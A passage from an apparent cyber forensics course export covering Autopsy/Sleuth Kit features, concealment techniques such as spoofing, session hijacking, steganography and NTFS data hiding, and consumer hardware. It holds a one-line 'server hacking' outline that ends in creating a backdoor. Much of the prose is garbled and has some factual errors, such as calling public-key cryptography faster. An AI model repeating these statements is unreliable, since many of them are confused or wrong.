Functionality: The user should be able to add new functionality by creating plugins. It can analyze all or part of the underlying data source.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/8.html Page 19 of 135
1/1
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Frame works
The tool will offer some standard approaches for ingesting data. It also offers procedures for analyzing it and reporting any findings. So developers can follow the same design patterns when possible.
Uses The Autopsy Browser must offer the wizards and historical tools. It will make the job easier for users to repeat their steps without excessive reconfiguration.
Fast Autopsy runs background tasks. It does it in parallel using multiple cores and provides results. It may take hours to search the drive. But you will know in minutes.
Cost Effective Autopsy is free of cost. The cost effective digital forensics solutions are essential. Autopsy offers the same core features as other digital forensics tools and offers. Other commercial tools do not provide. Example: Web artifact analysis and registry analysis.
Analysis Modes There are two analysis modes. They are provided below. Dead analysis Live analysis
Dead analysis A dead analysis occurs when a dedicated analysis system is used to examine the data. It does the job from a suspect system. In this Autopsy and The Sleuth Kit are run in a trusted environment, typically in a lab. Autopsy and TSK support raw, Expert Witness, and AFF file formats. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/9.html Page 20 of 135
1/2
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Live analysis A live analysis occurs when the suspect system is being analyzed while it is running. Autopsy and Sleuth Kit are run from a CD in an un trusted environment. After it is confirmed, the system can be acquired. Then a dead analysis performed.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/9.html Page 21 of 135
2/2
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Evidence search technique
Search technique: The followings are searching techniques. File Listing File Content Hash Databases File Type Sorting Timeline of File Activity Keyword Search Meta Data Analysis Data Unit Analysis Image Details
File Listing File Listing is defined as Analyze. The files and directories are part of analyze. It includes the names of deleted files and files with Unicodebased names.
File Content File Content is the contents of file. It can be viewed in raw, hex, or the ASCII strings can be extracted. When data is interpreted, Autopsy sanitizes it to prevent damage. Therefore the local analysis system is protected. Autopsy does not use any clientside scripting languages.
Hash Databases Lookup unknown files in a hash database. This will help you to quickly identify it as good or bad. Autopsy uses the NIST National Software Reference Library (NSRL). Its user created databases of known good and known bad files.
File Type Sorting file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/10.html Page 22 of 135
1/2
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
It is based on their internal signatures to identify files of a known type. Autopsy can also extract only graphic images (including thumbnails). The extension of the file will also be compared to the file type. This will help to identify files that may have had their extension changed to hide them.
File Activity In some cases, timeline of file activity can help identify areas of a file system that may contain evidence. Autopsy can create timelines that contain entries for the Modified, Access, and Change (MAC) times of both allocated and unallocated files.
Keyword Search Keyword searches of the file system image can be performed using ASCII strings and grip regular expressions. Searches can be performed on either the full file system image. An index file can be created for faster searches.
Meta Data Analysis Meta Data structures contain the details about files and directories. Autopsy allows viewing the details of any meta data structure in the file system. Autopsy will search the directories to identify the full path of the file that has allocated the structure. Application: It is useful for recovering deleted content.
Data Unit Analysis Data Units are where the file content is stored. Autopsy allows viewing the contents of any data unit in a variety of formats. It includes ASCII, hexdump, and strings. Autopsy will search the meta data structures to identify which has allocated the data unit.
Image Details File system details can be viewed by images. It is including ondisk layout and times of activity. This mode provides information that is useful during data recovery. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/10.html Page 23 of 135
2/2
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Case Management
Investigations are organized by cases. It can contain one or more hosts. Each host is configured to have its own time zone setting and clock skew. Each host can contain one or more file system images to analyze. Event Sequencer Notes Image Integrity Reports Logging Open Design Client Server Model
Event Sequencer Timebased events can be added from file activity or IDS and firewall logs. Autopsy sorts the events. So that the sequence of incident events can be more easily determined.
Notes Notes can be saved on a perhost and perinvestigator basis. These allow you to make quick notes about files and structures. The original location can be easily recalled. All notes are stored in an ASCII file.
Image Integrity It is crucial to ensure that files are not modified during analysis. Autopsy, by default, will generate an MD5 value for all files that are imported or created. The integrity of any file that Autopsy uses can be validated at any time.
Reports Autopsy can create ASCII reports for files and other file system structures. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/11.html Page 24 of 135
1/2
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
This enables to quickly make consistent data sheets during the investigation.
Logging Audit logs are created on a case host and investigator level. So that actions can be easily recalled. The exact Sleuth Kit commands that are executed are also logged.
Open Design The code of Autopsy is open source and all files that it uses are in a raw format. All configuration files are in ASCII text. This makes it easy to export the data and archive it. It also does not restrict from using other tools that may solve the specific problem more appropriately.
Client Server Model Autopsy is HTMLbased. And therefore you do not have to be on the same system as the file system images. This allows multiple investigators to use the same server and connect from their personal systems.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/11.html Page 25 of 135
2/2
UNIT - 3 Concealment Techniques
Page 26 of 135
Concealment Techniques 8/17/2015
scorm content
Spoliation
The spoliation of evidence is the intentional activity. It occurs due to negligent withholding. It happens through hiding and altering of the original structure. It is also destroying of evidence relevant to a legal proceeding.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/2.html Page 27 of 135
1/1
Concealment Techniques 8/17/2015
scorm content
Cryptography
In cryptography, a key is a piece of information (a parameter). It determines that the functional output of a cryptographic algorithm or cipher. Without a key, the algorithm would produce no useful result.
Function of cryptography Cryptography is used to protect email messages, It also preserves credit card information. It helps to protect corporate data.
Classification There are two types of cryptography. They are symmetrickey systems publickey
Publickey cryptography Publickey cryptography is also known as asymmetric cryptography. It refers to a cryptographicalgorithm. It requires two separate keys, One of which is secret (or private) and another one of which is public.
Advantages The main advantages of public key systems are simpler. It is also much faster.
Privatekey cryptography Symmetric encryption is also called privatekey encryption. It gives secretkey encryption. It involves using the same key for encryption and decryption.
Why need secrecy? A key is often easier to protect (it′s typically a small piece of information). It happens better than an encryption algorithm. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/3.html Page 28 of 135
1/2
Concealment Techniques 8/17/2015
scorm content
It is also easier to change if compromised. Application: Protect all kind of personal information.
Scope of key The keys are generated first. They are used with a given suite of algorithms. This setup is called cryptosystem.
Size of key A key length of 80 bits is generally considered. It is the minimum size for strong security. It also has symmetric encryption algorithms. 128bit keys are commonly used and considered very strong.
Key choice To prevent a key from being guessed, keys need to be generated. It is truly having sufficient entropy. The problem of how to safely generate truly random keys is difficult. It has been addressed in many ways by various cryptographic systems.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/3.html Page 29 of 135
2/2
Concealment Techniques 8/17/2015
scorm content
Hashing function
A hash function is any kind of algorithm. It maps data of arbitrary length to data of a fixed length. The values returned by a hash function are called hash values. The other names of hash values are hash codes, hash sums, checksums or simply hashes.
Hash tables Hash functions are primarily used in hash tables. It quickly locates a data record and given its search key. Example: A dictionary definition.
Caches Hash functions are also used to build caches for large data sets stored in slow media. A cache is generally simpler than a hashed search table. Any collision can be resolved by discarding or writing.
Bloom filters Hash functions are an essential ingredient of the Bloom filter. A spaceefficient probabilistic data structure is used to test whether an element is a member of asset.
Hash value A hash value, also called a message digest. It is a number generated from a string of text. The hash value is substantially smaller than the text itself. It is generated by the hash algorithm in such a way that same hash value is negligible.
Hash function algorithms Trivial hash function Perfect hashing Minimal perfect hashing
List of hash functions file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/4.html Page 30 of 135
1/2
Concealment Techniques 8/17/2015
scorm content
NIST hash function competition Pearson hashing Zobrist hashing
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/4.html Page 31 of 135
2/2
Concealment Techniques 8/17/2015
scorm content
Spoofing
A spoofing attack is in the context of network security. A spoofing attack is a situation in which one person or program successfully masquerades as another. It occurs by falsifying data. Then gains an illegitimate advantage.
TCP/IP Many of the protocols in the TCP/IP suite do not provide mechanisms. It will not give specific directions for authenticating the source or destination of a message.
Referrer spoofing Some websites, especially pornographic pay sites, allow access to their materials only from certain approved pages. This is enforced by checking the HTTP request. This referrer header however can be changed is known as "referrer spoofing" or "Reftar spoofing".
Filesharing networks Spoofing can also refer to copyright holder. It happens by placing distorted or unlistenable versions of works on filesharing networks.
Caller ID spoofing Public telephone networks often provide Caller ID information. It includes the caller′s name and number. However some technologies allow callers to forge Caller ID information. Then it presents false names and numbers.
Email address spoofing The sender information shown in emails can be spoofed easily. This technique is commonly used by spammers to hide the origin of their emails. It leads to problems such as misdirected bounces. Example: Email spam backscatter. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/5.html Page 32 of 135
1/2
Concealment Techniques 8/17/2015
scorm content
GPS Spoofing A GPS spoofing attack attempts to deceive a GPS receiver. It happens by broadcasting counterfeit GPS signals. They are structured to resemble a set of normal GPS signals. Or it occurs by rebroadcasting genuine signals captured elsewhere or at a different time.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/5.html Page 33 of 135
2/2
Concealment Techniques 8/17/2015
scorm content
Internet Protocol
The Internet Protocol (IP) is a principal communications protocol. In the Internet protocol suite the data gram’s are relayed across network boundaries. It happens through routing function. It is performed by enabling internet working, and essentially establishes the Internet.
Function of IP The IP is responsible for addressing hosts. It is also for routing datagram’s from a source host to a destination host. It occurs across one or more IP networks. For this purpose, the Internet Protocol defines and provides an addressing system. It has two functions: identifying hosts; and providing a logical location service. Application: Identifying hosts and providing a logical location service.
Datagram Each datagram consists of two components: a header and a payload. The IP header is tagged with the source IP address. The destination IP address, and other metadata are needed to route and deliver the datagram. The payload is the data that is transported.
Capacity and Capability The dynamic nature of the Internet and the diversity of its components provide no guarantee. Therefore any particular path is actually capable or suitable for, performing the data transmission requested.
Reliability Internet Protocol uses the endtoend principle in its design. Under this design, the network infrastructure is assumed in different way. It is assumed to be inherently unreliable at any single network element. Sometimes it is assumed as transmission medium and dynamic in terms of availability of links and nodes.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/6.html Page 34 of 135
1/1
Concealment Techniques 8/17/2015
scorm content
Transmission Control
The TCP stands for Transmission Control Protocol. It is one of the core protocols of the Internet protocol suite (IP). It is so common that the entire suite is called TCP/IP.
Connection The TCP uses three way connection to establish a connection way handshake. SYN SYNACK ACK
SYN The active open is performed by the client. It is by sending a SYN to the server. The client sets the segment′s sequence number to a random value A.
SYNACK The server replies with a SYNACK. The acknowledgment number is set to one more than the received sequence number. i.e. A+1, and the sequence number chooses for the packet is another random number B.
ACK Finally the client sends an ACK back to the server. The sequence number is set to the received acknowledgment value. i.e. A+1, and the acknowledgment number is set to one more than the received sequence number i.e. B+1.
Data transfer Ordered data transfer : The destination host rearranges according to sequence number. Retransmission of lost packets : Any cumulative stream is not acknowledged and re transmitted. Flow control : A sender transfers data to guarantee reliable delivery. The receiver continually hints the sender on how much data can be received. It happens when the receiving host′s buffer fills. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/7.html Page 35 of 135
1/2
Concealment Techniques 8/17/2015
scorm content
Congestion control Benefits: Reliable for how much data can be received.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/7.html Page 36 of 135
2/2
Concealment Techniques 8/17/2015
scorm content
Session hijacking
It is also known as cookie hijacking. The exploitation of a valid computer session, sometimes also called a session key. It is to gain unauthorized access to information or services in a computer system. Methods in hijacking: Session fixation Session side jacking Crosssite scripting
Session fixation Where the attacker sets a user′s session an id. It is done to one to know him. For example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in. Example: by sending the user an email with a link.
Session side jacking Where the attacker uses packet sniffing. It is to read network traffic between two parties. Then it helps to steal the session cookie.
Crosssite scripting Where the attacker tricks the user′s computer into running code. It is treated as trustworthy. Because it appears to be belonging to the server. Benefits: Allowing the attacker to obtain a copy of the cookie.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/8.html Page 37 of 135
1/1
Concealment Techniques 8/17/2015
scorm content
Polymorphism
Polymorphism is the provision of a single interface. It happens in programming languages. It occurs at different entities and types.
Polymorphism described Adhoc polymorphism and parametric polymorphism were originally described in fundamental concepts. In Programming Languages, a set of lecture notes written in 1967. It was written by British computer scientist Christopher Strachey.
Polymorphism types Ad hoc polymorphism Parametric polymorphism Polytypism
Polytypic A polytypic function is more general than polymorphic. And in such a function, "though one can provide fixed ad hoc cases. It happens for specific data types where an adhoc combinatory is absent.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/9.html Page 38 of 135
1/1
Concealment Techniques 8/17/2015
scorm content
Steganography
Steganography is the art or practice of concealing a message. It also hides image, or file. It occurs within another message, image, or file.
About Steganography The word steganography of Greek origin and means "covered writing" or "concealed writing".
Steganography advantage It is plainly visible encrypted messages. It is no matter how unbreakable.
Physical Techniques Hidden messages on messenger′s body also used in ancient Greece. Hidden messages on paper written in secret inks. It is under other messages or on the blank parts of other messages.
Digital Techniques Here the message is concealed within the lowest bits of noisy images. Sometimes it is also concealed sound files. Hiding messages is possible by changing the order of elements in a set.
Applications Steganography is used by some modern printers. It includes HP and Xerox brand colour laser printers.
Methods The following two methods are used to perform stenography. Visual analysis Statistical analysis
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/10.html Page 39 of 135
1/1
Concealment Techniques 8/17/2015
scorm content
Antiforensics
Anticomputer forensics is a general term for a set of techniques. It is used as countermeasures to forensic analysis.
Antiforensic tools In the past antiforensic tools have focused on attacking the forensic process. It happens by destroying data, hiding data, or altering data usage information.
Antiforensic Effectiveness Antiforensic methods rely on several weaknesses in the forensic process. It includes the human element, dependency on tools. It also includes the physical/logical limitations of computers.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/11.html Page 40 of 135
1/1
Concealment Techniques 8/17/2015
scorm content
Cloaking Techniques
Cloaking is a search engine optimization (SEO) technique. In which the content presented to the search engine spider. It is different from that presented to the user′s browser.
Uses of Cloaking Cloaking is often used as a spamdexing technique. It is to try and trick search engines. This helps to give the relevant site a higher ranking.
Data hiding Data hiding is the principle of segregation of the design decisions in a computer program. They are most likely to change. Thus it protects other parts of the program from extensive modification.
Renaming files MSDOS and Windows command line users Microsoft Windows users Linux and Unix users
Data hiding on NTFS To detect and recover data hidden using each of these methods.
Methodology And Tools Tools for hiding data. Runtime’s Disk Explorer for NTFS v2.31. Except for Alternate Data Streams ADS. Tools for restoring data. Windows XP chkdsk and Fsutil. Windows OEM Support Tools NFI. Sleuth Kit 2.02. Foremost 0.69. Come forth 1.00. Also dd, hexedit and strings. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/12.html Page 41 of 135
1/3
Concealment Techniques 8/17/2015
scorm content
Master File Table Every file and every directory has at least one entry in MFT. It is including the MFT itself. Each entry in MFT is called a file record. It has a default fixed size of 1024 bytes. The first 42 bytes are reserved for the MFT entry. Header and the remaining bytes are used to store.
Clusters A data unit in NTFS is called a cluster. It is the smallest disk space allocation unit. Every cluster in NTFS has a Logical Cluster Number (LCN), starting with 0 for the first cluster. Clusters which belong to a file are also assigned a Virtual Cluster Number (VCN).
Meta data files Describe the structure of the file system itself. Microsoft defined 16 standard MFT records (file numbers 0 –15), (some currently unused reserved for future use).
Hiding data in BadClus It happens through. Slipping modifying Logical Block Number (LBN) to physical mapping to skip the defective sector. Remapping. Reallocating LBN from defective area to a spare sector.
Hiding Data in DATA Attribute Hiding Data in Data attribute is possible except the directories and the extension metadata files. Except for BadClus, the content used in NTFS operation. Possible to append some hidden data. DATA attribute is both read and written by NTFS. So the appended data could be overwritten.
NTFS Boot file file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/12.html Page 42 of 135
2/3
Concealment Techniques 8/17/2015
scorm content
This is the only file with a fixed location. It always starts at the first cluster of the file system.
Alternate Data Streams ADSs are a unique feature of NTFS file systems introduced with Windows NT 3.1 (early 1990s). Compatibility between Windows NT servers and Macintosh Clients which use Hierarchical File System (HFS).
At Directory DATA attribute is unnecessary for a directory. Validation checking with chkdsk. When a directory contains a DATA attribute the validation is possible. As a result, the DATA attribute in a directory can be used to hide data Alternate data streams. ISO also be created with directories not just data files to hide data.
Testing NTFS Integrity The chkdsk command any error indicates that the file system could have been Manipulated and left in an unstable state. Standard Windows utility Fsutil or the Sleuth Kit command fastest to obtain general information about NTFS system under investigation.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/12.html Page 43 of 135
3/3
UNIT - 4 Hardware: Model System Platforms
Page 44 of 135
Hardware: Model System Platforms 8/17/2015
scorm content
Computer
What is computer? Computer is basically a device. It transforms data into meaningful information. Data can be anything like marks obtained by you in various subjects. It can also be name, age, sex, weight, height, etc. of all the students in a class.
Performance A computer can accept data store data process data as desired retrieve the stored data print the result in desired format
Various Performance The computer performs basically five major operations of functions irrespective of their size and make. They are it accepts data or instruction by way of input, it stores data, it can process data as required by the user, it gives results in the form of output, and it controls all operations inside a computer.
Computer languages The computer languages are Low Level Language High Level Language
Peripheral devices The peripheral devices are given below.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/2.html Page 45 of 135
1/2
Hardware: Model System Platforms 8/17/2015
scorm content
Input Devices Output Devices
Input Devices The followings are input devices. Keyboard Mouse Optical/magnetic Scanner Touch Screen Microphone for voice as input
Output Devices The out put devices are given below Monitor (Visual Display Unit) Printer Speakers
Power Supplies D.C. to D.C. converters and D.C. to A.C. Converters belong to the category of Switched Mode Power Supplies (SMPS).
SMPS Types D.C. to D.C. Converter Forward Converter Fly back Converter SelfOscillating Fly back Converter
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/2.html Page 46 of 135
2/2
Hardware: Model System Platforms 8/17/2015
scorm content
Hard disk drive
A hard disk drive (HDD) is a data storage device. It is used rapidly for rotating disks (platters). The rotating disks are coated with magnetic material. Application: It is used for storing and retrieving digital information.
Use of HDD An HDD retains its data even when powered off. Data is read in a randomaccess manner, It means individual blocks of data can be stored or retrieved in any order rather than sequentially.
Parts of HDD An HDD consists of one or more rigid ("hard") rapidly rotating disks (platters). They are supported with magnetic heads. They are arranged on a moving actuator arm. It reads and writes data to the surfaces.
History of HDD The HDD is introduced by IBM in 1956. HDDs became the dominant secondary storage device. It was used as general purpose computer by the early 1960s.
New HDD technologies Heatassisted magnetic recording. Bitpatterned recording. Shingled magnetic recording.
Hard Drive components The followings are hard drive components head actuator read/write actuator arm
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/3.html Page 47 of 135
1/2
Hardware: Model System Platforms 8/17/2015
scorm content
read/write head Spindle, platter Disk controller
Hard drive types There are two types of hard drives. They are External hard drives Internal hard drives
HDD replaced by SSD Solid State Drives (SSDs) are starting to replace (HDDs) in many computers. Because of advantages, these drives have over HDD. The SSD is becoming more and more popular. HDD will continue to be in desktop computers with SSD because of the available capacity HDD offers over SSD.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/3.html Page 48 of 135
2/2
Hardware: Model System Platforms 8/17/2015
scorm content
Laptop
A laptop is a portable with a calm shell form factor. It is suitable for mobile use. They are also some times called notebook computers or notebooks.
Uses of laptop Laptops are commonly used in a variety of settings. They include work, education, and personal multimedia.
Components of laptop A laptop combines the components and inputs as a desktop computer; It includes display, speakers and keyboard. It also has pointing device (such as a touchpad), into a single device.
History of Laptop A "personal, portable information manipulator" was imagined by Alan Kay. It happened at Xerox PARC in 1968. The he described in his 1972 paper as the "Daybook".
Categories 3D Built a class room Gaming Built a class business
Major brands Acer Dell Lenovo
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/4.html Page 49 of 135
1/1
Hardware: Model System Platforms 8/17/2015
scorm content
Tablet computer
A tablet computer or simply tablet is a mobile computer with display, circuitry and battery in a single unit. Tablets contains: Tablets are equipped with sensors. It includes cameras and microphone. The accelerometer and touch screen, with finger or stylus gestures ar part of tablet. Besides these, the computer mouse and keyboard are also attached.
Touch interface A key component among tablet computers are touch input. This allows the user to navigate. It makes the job easier and type with a virtual keyboard.
Touch screen types The touch screen types are given below. Resistive touchscreens Capacitive touchscreens
What is Resistive touch screen? Resistive touch screens are passive. It responds to pressure on the screen. They allow a high level of precision. It is useful in emulating a pointer. But it may require calibration. Because of the high resolution, a stylus or fingernail is often used.
What is Capacitive touch screens? Capacitive touch screens tend to be less accurate. But it is more responsive than resistive devices. Because they require a conductive material, such as a fingertip.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/5.html Page 50 of 135
1/2
Hardware: Model System Platforms 8/17/2015
scorm content
It is for facilitating input. They are not common among stylusoriented devices, but are prominent on consumer devices.
Features The followings are touching screen features. Hardware Highdefinition, Antiglare display. GPS satellite location. Wireless internet connectivity. (usually with WiFi standard and optional mobile broadband).
Data storage Onboard flash memory. Ports for removable storage. Cloud storage options for backup and syncing data across devices.
Additional inputs Speech recognition Gesture recognition
Types of Operating system Android Blackberry OS IOS Linux Windows
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/5.html Page 51 of 135
2/2
Hardware: Model System Platforms 8/17/2015
scorm content
Server A server is system software. It is suitable computer hardware. It responds to requests across a computer network. This set up will provide a network service.
Typical computing servers Typical computing servers are database server. It includes file server, mail server and print server. It also has web server, gaming server, and application server.
Server operating systems GUI not available or optional ability to reconfigure. It can update both hardware and software. Advanced backup facilities are permitting regular and frequent online backups of critical data. It also permits flexible and advanced networking &automation capabilities. They are such as tight system security with advanced user, resource, data, and memory protection. Example: UNIX and services in Windows.
Types of servers Application server: A server dedicated to running certain software applications. Catalog server: A central search point for information across a distributed network. Communications server: This server is carriergrade computing platform. It helps for communications networks. Computer server: A server intended for intensive computations especially scientific. Database server: It provides database services to other computer programs or computers. Fax server: It provides fax services for clients. File server: It provides remote access to files. Game server: A server that video game clients connect to play online together. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/6.html Page 52 of 135
1/2
Hardware: Model System Platforms 8/17/2015
scorm content
Energy consumption In 2010, data centers consume lot s of energy. (servers, cooling, and other electrical infrastructure). It was responsible for 1.11.5% of electrical energy consumption worldwide. It stood upto 1.72.2% in the United States.
Size classes Rack server Tower server Miniature (home) servers Mini rack servers blade server Mobile Server UltraDense Server Super servers
Server hacking Learn a programming language Know your target Test the target Crack the password or authentication process Create a backdoor
Server virtualization Server virtualization is the masking of server resources. It includes the number and identity of individual physical servers. It also has number and identity of processors, and operating systems, from server users.
Virtual private servers The server administrator uses a software application. It helps to divide one physical server into multiple isolated virtual environments. But they are also known as guests, instances, containers or emulations. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/6.html Page 53 of 135
2/2
Hardware: Model System Platforms 8/17/2015
scorm content
iPods
The iPods use the Apple iTunes software to transfer music to the music devices. Using iTunes you can store music library. You can burn music from CD. You can also transfer photos, videos, game and small applications (when supported by the player) and many other features.
Invention The first line was released on October 23, 2001. It was about 8½ months after iTunes (Macintosh version) released.
Current versions Ultracompact iPod Shuffle Compact iPod Nano The touch screen iPod Touch, and The hard drivebased iPod Classic
Uses IPods can serve as external data storage devices. Storage capacity varies by model. It ranges from 2 GB for the iPod Shuffle to 160 GB for the iPod Classic. Accessories: Some accessories add extra features that other music players. Examples: sound recorders, FM radio tuners, wired remote controls, and audio/visual cables for TV connections.
Software The iPod line can play several audio file formats. It includes MP3, AAC/M4A, Protected AAC, AIFF, WAV, Audible audio book, and Apple Lossless.
Buttons The buttons perform basic functions. They are such as menu, play, pause, next track, and previous track.
Reliability and durability file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/7.html Page 54 of 135
1/2
Hardware: Model System Platforms 8/17/2015
scorm content
A 2005 survey conducted on the MacInTouch website. It found that the iPod line had an average failure rate of 13.7%. The true iPod failure rate may be lower than it appears.
What is an MP3 Player? An MP3 player is a type of digital audio player. It falls under the broader category of PMP devices. It is a small — often weighing less than an ounce. It is handheld device that use flash memory for storing MP3 files.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/7.html Page 55 of 135
2/2
Hardware: Model System Platforms 8/17/2015
scorm content
PDA
A personal digital assistant (PDA), also known as a palmtop computer, or personal data assistant. It is a mobile device that functions as a personal information manager. PDAs are largely considered obsolete with the widespread adoption of smart phones.
First PDA The first PDA was released in 1984 by Psion, the Organizer. Followed by Psion′s Series 3, in 1991, which began to resemble the more familiar PDA style. It also had a full keyboard.
Features The features are listed below. Touch screen Memory cards Wired connectivity Wireless connectivity
Touch screen in PDA Virtual keyboard Handwriting recognition
Memory Cards in PDA PDAs use micro SD cards. It is electronically compatible with SD cards. But it has a much smaller physical size.
New versions of PDAs Some early PDAs were able to connect to the Internet indirectly. It happens through an external modem connected via the PDA′s serial port. Sometimes it has got connected as "sync". It is performed by connector or directly by using an expansion card that provided an Ethernet port. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/8.html Page 56 of 135
1/3
Hardware: Model System Platforms 8/17/2015
scorm content
Wireless connectivity Many modern PDAs have WiFi wireless network connectivity. It can connect to WiFi hotspots as well.
Operating systems The operating systems of wireless connectivity are Palm OS Android IOS Webhost
Palm OS Palm OS is also known as Garnet OS. It is a mobile operating system. It was initially developed by Palm, Inc., It was meant for personal digital assistants (PDAs) in 1996.
Design Palm OS is designed for ease of use. It is bestowed with a touch screenbased graphical user interface.
Android Android is an operating system. It is based on the Linux kernel. It is designed primarily for touch screen mobile devices. They are such as smart phones and tablet computers.
Android features The android features are listed below. Messaging Web browser Voice based features file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/8.html Page 57 of 135
2/3
Hardware: Model System Platforms 8/17/2015
scorm content
Multitouch Screen capture
Additional features There are some more additional features listed below. Video calling Multiple language Support Accessibility
Connectivity The connectivity feature has following features. Connectivity Bluetooth Tethering
Media Streaming media support Media support External storage
Others Java support Handset layouts
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/8.html Page 58 of 135
3/3
Hardware: Model System Platforms 8/17/2015
scorm content
Digital Appliances
Washing machine A washing machine is a machine. It helps to wash laundry. The cloths and and sheets are washed by washing machine. Example: laundry machine, clothes washer, or washer
Washing Machine Parts The washing machine has following parts. Water inlet control valve Water pump Tub Agitator or rotating disc Motor of the washing machine Timer Printed circuit board (PCB) Drain pipe
Water inlet There is water inlet control valve near the water inlet point of the washing machine. When you load the clothes in washing machine, this valve gets opened and closes automatically. Depending on the total quantity of the water required the valve operates on its own.
Water pump The water pump circulates water through the washing machine. It works in two directions. It recirculates the water during wash cycle. It drains the water during the spin cycle.
Tub Two types of tubs are in the washing machine: inner and outer. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/9.html Page 59 of 135
1/5
Hardware: Model System Platforms 8/17/2015
scorm content
The clothes are loaded in the inner tub, where the clothes are washed, rinsed and dried. The inner tub has small holes for draining the water. The external tub covers the inner tub. It supports various cycles of clothes washing.
Agitator The agitator is located inside the tub of the washing machine. It is the important part of the washing machine. It actually performs the cleaning operation of the clothes.
Motor The motor is coupled to the agitator or the disc. It produces rotator motion. These are multi speed motors. Its speed can be changed as per the requirement. In fully automatic washing machine the agitator changes automatically as per the load.
Timer The timer helps setting the wash time for the clothes manually. In the automatic mode the time is set automatically. It gets set depends upon the number of clothes inside the washing machine.
PCB The PCB comprises of the various electronic components and circuits. They are sort of artificial intelligence devices. They sense various external conditions and take the decisions accordingly. These are also called as fuzzy logic systems. Thus the PCB will calculate the total weight of the clothes. The PCB also determines quantity of water and detergent required and total time required for washing.
Drain pipe The drain pipe enables removing the dirty water. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/9.html Page 60 of 135
2/5
Hardware: Model System Platforms 8/17/2015
scorm content
Dirty water comes from the washing which was used for the washing purpose. Application: Removing the dirty water from washing.
Types There are two types of washing machines. They are Top loading washing machine Front loading washing machine
Top loading In this machine, the clothes are loaded from the top of the washing machine. There is a cover at the top that helps loading and unloading of clothes. The top loading washing machine is preferred by the people. This is more widely used than the front loading.
Front loading In this machine, the clothes are loaded from the front side. The front loading washing machines consume less electric energy, water and detergent. It also gives better washing results compared to the top loading washing machine. Benefits: Consume less electric energy. Top loading machines classification: They are Semiautomatic Fully automatic
Semiautomatic washing machine It has separate tubs or vessels for the washer and the drier. There are two separate timers. They enable setting washing and drying times. Put sufficient quantity of the water and detergent and then set the timer.
Fully automatic machine In fully automatic washing machine there is only one tub. It serves as the washer.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/9.html Page 61 of 135
